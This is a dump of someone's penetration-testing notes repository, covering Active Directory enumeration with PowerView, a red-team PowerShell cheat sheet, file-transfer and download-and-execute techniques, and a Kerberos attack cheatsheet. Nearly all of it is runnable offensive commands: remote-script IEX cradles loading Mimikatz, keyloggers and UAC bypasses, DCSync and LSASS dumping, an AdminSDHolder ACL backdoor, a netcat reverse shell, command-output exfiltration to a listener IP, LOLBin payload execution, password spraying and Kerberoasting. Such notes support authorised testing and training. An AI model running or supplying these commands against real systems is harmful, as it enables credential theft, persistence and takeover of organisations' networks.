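├── PowerView-3.0-tricks.ps1 ├── README.md ├── RedTeam_CheatSheet.ps1 ├── filetransfers.md ├── kerberos.md ├── linux-privesc.md ├── pivoting.md ├── web.md └── windows-privesc.md
/PowerView-3.0-tricks.ps1:
--------------------------------------------------------------------------------
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# NOTE(review): that is a branch, not a pinned commit - check the URL still resolves and review
# the script before loading it into a target. Tokens in <angle brackets> below are placeholders
# (the original rendering stripped them, leaving several commands without their arguments).

# New function naming schema:
# Verbs:
#   Get    : retrieve full raw data sets
#   Find   : 'find' specific data entries in a data set
#   Add    : add a new object to a destination
#   Set    : modify a given object
#   Invoke : lazy catch-all
# Nouns:
#   Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
#   Verb-WMI*    : indicates that WMI is being used under the hood to execute enumeration
#   Verb-Net*    : indicates that Win32 API access is being used under the hood


# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# use an alternate credential for any function
# (a plaintext password on the command line ends up in PowerShell history / transcripts / script-block logs)
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred

# retrieve all the computer dns host names a GPP password applies to (argument is the GPO's GUID)
Get-DomainOU -GPLink '<GPO_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}

# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
# (pwdlastset=0, i.e. "must change password at next logon", also satisfies this filter)
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset

# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname

# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE

# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED

# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

# use multiple identity types for any *-Domain* function (SID, DN, GUID, samaccountname)
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff

# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN

# check for users who don't have kerberos preauthentication set (AS-REP roastable)
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

# find all service accounts in "Domain Admins"
# (matches on the user's own memberof attribute, so only *direct* DA membership is caught; nested membership is missed)
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'

# find any users/computers with constrained delegation set
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local

# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."

# Get the logged on users for all machines in any *server* OU in a particular domain
# (Get-DomainComputer returns objects; pass the dnshostname string, not the whole object, to -ComputerName)
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_.dnshostname}}

# enumerate all global catalogs in the forest
Get-ForestGlobalCatalog

# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAPFilter "(name=$_)" -Properties dnshostname}

# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...

# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # ticket lifetimes - useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.

# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>

# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <User> -Domain <domain> -LocalGroup RDP

# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
# (the new ACE is only stamped onto the protected objects when SDProp next runs, so it is not effective immediately)
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
# 'most': rights held via group membership are not expanded here. With -ResolveGUIDs the resolved
# right name lives in ObjectAceType (same property the second DCSync query in this file uses);
# -match is case-insensitive so 'replication-get' covers both DS-Replication-Get-Changes and -All.
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

# find linked DA accounts using name correlation (first two words of the displayname)
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}

# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

# Enumerate permissions for GPOs where principals with RIDs >= 1000 (i.e. not built-in accounts/groups) have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}

# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name

# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
    # extract the domain the foreign user was added to
    $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
    # check if we've already enumerated this domain
    if (-not $Domains[$ForeignUserDomain]) {
        $Domains[$ForeignUserDomain] = $True
        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
        $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
        # the scope parameter is -GroupScope, as used for the NotGlobal query above ('-Scope' is not a Get-DomainGroup parameter)
        Get-DomainGroup -Domain $ForeignUserDomain -GroupScope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
    }
}
$ForeignMemberships | fl

# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf

# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the first result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

# retrieve *most* users who can perform DC replication for testlab.local (i.e. DCsync)
# Get-ObjectACL is the pre-3.0 alias of Get-DomainObjectAcl; same caveat as above about group-held rights
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
    ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}

# check if any user passwords are set in the (cleartext) userPassword attribute; the raw bytes are decoded as ASCII
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# pentest-notes

Just my notes of things I have come across and don't want to google and forget anymore. Some checklists for privilege escalation and enumeration.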
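
--------------------------------------------------------------------------------
/RedTeam_CheatSheet.ps1:
--------------------------------------------------------------------------------
## Forked from here https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf
## NOTE(review): almost every one-liner below fetches a script from a GitHub *branch* (master/dev)
## and pipes it straight into IEX. That is unpinned remote code: the path can move or its contents
## can change under you. Pin a commit (raw.githubusercontent.com/<org>/<repo>/<commit>/...) or host
## a reviewed copy yourself. Expect AMSI/Defender to flag most of these stock scripts by default.
## Tokens in <angle brackets> are placeholders the original rendering stripped.

# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

## ADRecon script to generate XLSX file of domain properties
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/sense-of-security/ADRecon/master/ADRecon.ps1')"


# Priv Esc
## PowerUp script
## (ASCII quotes - the original used curly quotes, which cmd.exe does not treat as string delimiters)
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

## cPasswords in sysvol (cmd.exe form, then PowerShell form)
findstr /S cpassword %logonserver%\sysvol\*.xml
findstr /S cpassword $env:logonserver\sysvol\*.xml

## Inveigh
## (parameter dashes below are plain ASCII '-'; the original had en-dashes in front of NBNS/mDNS/Proxy)
### Start inveigh using Basic Auth - logging to file
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y -HTTPAuth Basic"

### Start inveigh in silent mode (no popups)
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y -WPADAuth anonymous"

## Invoke-HotPotato Exploit (adds <user> to the local Administrators group)
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Tater/master/Tater.ps1');invoke-Tater -Command 'net localgroup Administrators <user> /add'"

## Bypass UAC and launch PowerShell window as admin
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

## Invoke-Kerberoast with Hashcat Output
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"


# Reg Keys
## Enable Wdigest (needs admin; the path is ...\Control\SecurityProviders - the original had 'Contro').
## Only logons that happen *after* the key is set leave plaintext creds in LSASS.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

## Check always install elevated (the .msi privesc only works when AlwaysInstallElevated is 1 under both keys)
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer


# Mimikatz
## Invoke Mimikatz
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

## Import Mimikatz Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

## Perform DcSync attack (the calling context needs the DS-Replication-Get-Changes rights - see the DCSync ACL query in PowerView-3.0-tricks.ps1)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:demodomain /user:sqladmin"'

## Invoke-MassMimikatz
## ($env:COMPUTERNAME must not be single-quoted, or the literal text '$env:COMPUTERNAME' is piped in as the host name)
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');$env:COMPUTERNAME|Invoke-MassMimikatz -Verbose"

## Manual Procdump for offline mimikatz (needs SeDebugPrivilege, i.e. an elevated shell)
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp


# Useful Scripts/Commands
## Use Windows Debug api to pause live processes
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/Pause-Process/master/pause-process.ps1');Pause-Process -ID 1180;UnPause-Process -ID 1180;"

## Import Powersploits invoke-keystrokes
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')"

## Import Empire's Get-ClipboardContents
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1')"

## Import Get-TimedScreenshot
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-TimedScreenshot')"

## Return executed command output from 53/udp
### On your host:
$ nc -lnvup 53
### Replace <LISTENER_IP> with ip of the listening machine
powershell.exe -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<LISTENER_IP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
### TCP version
powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"<LISTENER_IP>\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}"


# Useful Links
## Nmap
https://nmap.org/dist/nmap-7.70-win32.zip

## 32 and 64 bit Windows Netcat Binary
https://eternallybored.org/misc/netcat/

## EyeWitness Binary
https://www.christophertruncer.com/InstallMe/EyeWitness.zip

## Sys InternalTools
https://live.sysinternals.com/
https://download.sysinternals.com/files/SysinternalsSuite.zip

## List of Binaries that can be used for living off the land techniques
https://github.com/api0cradle/LOLBAS
--------------------------------------------------------------------------------
/filetransfers.md:
--------------------------------------------------------------------------------
## File Transfers
Some methods to transfer files from linux to windows. Thanks to this post

https://blog.ropnop.com/transferring-files-from-kali-to-windows/

### Impacket smbserver

https://github.com/CoreSecurity/impacket

Run smbserver on kali with a share name and the folder you want (add `-smb2support` for targets that have SMB1 disabled, which is the default on current Windows builds)

```smbserver.py -smb2support BLAH /root/shells```

Then from windows victim we can easily copy files
```
net view \\10.10.10.10
dir \\10.10.10.10\BLAH
copy \\10.10.10.10\BLAH\met443.exe .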
```

You can also just execute things remotely:

```\\10.10.10.10\BLAH\met443.exe```

Or we can map a network drive/share and run something remotely like this (single backslashes - the doubled ones in the original were markdown escaping leaking into the code block):

```powershell
net use s: \\192.168.49.128\a
s:\nc.exe -e cmd.exe 192.168.49.128 139
```


### Powershell
The long way is to create a .ps1 file to connect to our webserver and download something...
```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.22:8000/wget.exe" >>wget.ps1
echo $file = "wget.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```
Then to run it from our regular windows shell:
```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```
We can run a one liner like this also in a normal windows shell to quickly download something. `DownloadFile` returns nothing, so do not wrap it in `IEX(...)` as the original did - Invoke-Expression then gets an empty command and errors out:
```
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.22/met443.exe','C:\Users\740i\Desktop\met443.exe')"
```
or
```
Invoke-WebRequest "https://10.10.14.22:8000/met443.exe" -OutFile "C:\Windows\Temp\blah.exe"
```
(`https://` to a bare IP only works if the listener presents a certificate the target trusts; with a plain `python -m http.server` listener use `http://`.)

More examples from an HTTP server

```powershell
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

# Download only
(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1")
# the all-users Startup folder needs admin to write to; whatever lands there runs at every user's next logon (persistence, not just transfer)
Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"

# Download and run Rubeus in memory, with arguments (example hash/SPN values - replace with your own)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) 68 | 69 | # Execute a specific method from an assembly 70 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll') 71 | $assem = [System.Reflection.Assembly]::Load($data) 72 | $class = $assem.GetType("ClassLibrary1.Class1") 73 | $method = $class.GetMethod("runner") 74 | $method.Invoke(0, $null) 75 | ``` 76 | 77 | From a Webdav server 78 | 79 | ```powershell 80 | powershell -exec bypass -f \\webdavserver\folder\payload.ps1 81 | ``` 82 | 83 | 84 | 85 | ### VBS 86 | You may have to pipe whatever file through unix2dos before copying to a windows machine. Sometimes its easier to just copy the wget binary from /usr/share/windows-binaries. 87 | ``` 88 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 89 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 90 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 91 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 92 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 93 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 94 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 95 | echo Err.Clear >> wget.vbs 96 | echo Set http = Nothing >> wget.vbs 97 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 98 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 99 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 100 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 101 | echo http.Open "GET", strURL, False >> wget.vbs 102 | echo http.Send >> wget.vbs 103 | echo Set http = Nothing >> wget.vbs 104 | echo varByteArray = http.ResponseBody >> wget.vbs 105 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 106 | echo Set ts = 
fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo strData = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
(The original listing had `cho Next`, which never writes the `Next` line, leaves the `For` loop unterminated and makes the script fail to parse.)

Then to run it - first argument is the URL, second is the local file name to write:
```
cscript wget.vbs http://<ip>/<file> <outfile>
```

### FTP

For FTP make sure you install it first. `python-pyftpdlib` is the Python 2 package name; on current distributions use `pip3 install pyftpdlib` and `python3 -m pyftpdlib -p 21`. Binding port 21 needs root.
```
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
```
You then can use a text file containing something like this to download a file...
```
open 10.10.14.22
anonymous
whatever
binary
get met443.exe
bye
```
Then do ```ftp -s:ftp_commands.txt``` and it downloads with no interaction.

To echo it as a one liner do this...
```
echo open 10.10.14.22>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get met8888.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt
```


### TFTP

You can use the metasploit ```auxiliary/server/tftp``` server. Or run atftpd:
```
mkdir /tftp
atftpd --daemon --port 69 /tftp
```
Then from windows (the `tftp` client is an optional Windows feature and is usually not installed by default on Vista and later)...
```
tftp -i 10.10.14.22 get met443.exe
```

### Debug.exe
https://github.com/g0tmi1k/exe2hex

This only works on 32-bit Windows: debug.exe is a 16-bit program and is not shipped on 64-bit installs. exe2hex builds the debug script for you.




## Download and Execute
The rest are quick methods on windows to execute a payload.
Taken from https://github.com/swisskyrepo/PayloadsAllTheThings

### Downloaded files location

- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV


### Cmd

```powershell
cmd.exe /k < \\webdavserver\folder\batchfile.txt
```

### Cscript / Wscript

```powershell
cscript //E:jscript \\webdavserver\folder\payload.txt
```

### Mshta

```powershell
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```

```powershell
mshta http://webserver/payload.hta
```

```powershell
mshta \\webdavserver\folder\payload.hta
```

### Rundll32

```powershell
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```

```powershell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```

### Regasm / Regsvc @subTee

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```

### Regsvr32 @subTee

```powershell
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```

```powershell
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```

### Odbcconf

```powershell
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```

### Msbuild

```powershell
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB!
payload.xml"
```

## Certutil

```
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
```

```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```

```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```

### Bitsadmin

```powershell
bitsadmin /transfer mydownloadjob /download /priority normal http://<host>/xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe
```
(single backslashes in the destination path; the doubled ones in the original were markdown escaping)


### References

- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- https://github.com/milkdevil/UltimateAppLockerByPassList
--------------------------------------------------------------------------------
/kerberos.md:
--------------------------------------------------------------------------------
# Kerberos cheatsheet

This is forked from this gist thanks to TarLogic for the hard work https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Tokens in `<angle brackets>` are placeholders (the original rendering stripped them, leaving most commands without their arguments).

## Bruteforcing

Note: password spraying against a domain drives account lockout; check the domain lockout policy first and keep to one password per lockout window.

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):
```shell
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
```shell
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

## ASREPRoast

With
[Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py:
```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```

Cracking with dictionary of passwords:
```shell
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>
```


## Kerberoasting

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py:
```shell
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```


With [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
```

